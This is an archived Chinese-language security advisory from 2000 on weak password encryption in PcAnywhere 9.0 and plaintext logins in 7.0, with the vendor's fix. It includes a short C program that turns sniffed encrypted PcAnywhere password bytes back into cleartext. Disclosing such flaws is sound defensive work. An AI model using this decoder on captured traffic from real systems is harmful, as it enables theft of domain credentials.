首页 -> 安全研究

安全研究

安全漏洞
PcAnywhere 口令使用弱加密方式

发布日期:2000-04-08
更新日期:2000-04-08

受影响系统:

PcAnywhere 9.0&PcAnywhere 7.0
描述:

    在缺省方式中,PcAnywhere9.0使用了很弱的加密手段保护用户名和口令在传输中不被截获。
许多用户在"空" 和 "PcAnywhere "二者之间选择一种来加密他们的口令传输。不幸的是,这是
一种很微弱的加密手段。
   PCAnywhere 认证用户通过其在 NT 域上的用户名和口令,用户登陆时被要求输入其帐号,
然后再通过"PcAnywhere"的加密方法加密后传输到 NT 。使用sniffer 的攻击者能偷听到其用
户名和口令。甚至不需要使用 L0phtCrack .
7.0 的 PcAnywhere 则更本没有使用加密传输,所有的信息都是明文发送的。

<* 来源:  Pascal Longpre (longprep@hotmail.com ) *>





测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <stdio.h>
#include <string.h>


void main() {


  char password[128];
  char cleartext[128];
  int i;


  // input the sniffed hex values here
  // Encrypted example of the 'aaaaa' password
  password[0]=0xca;
  password[1]=0xab;
  password[2]=0xcb;
  password[3]=0xa8;
  password[4]=0xca;
  password[5]='\0';


        cleartext[0]=0xca-password[0]+0x61;
        for (i=1;i<strlen(password);i++)
          cleartext[i] = password[i-1] ^ password[i] ^ i-1;
         
        cleartext[strlen(password)]='\0';


        printf("password is %s \n",cleartext);


}



建议:

   Symantec 建议使用公开或 "Symetric"密钥方式代替。详细信息在:
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w



浏览次数:6680
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障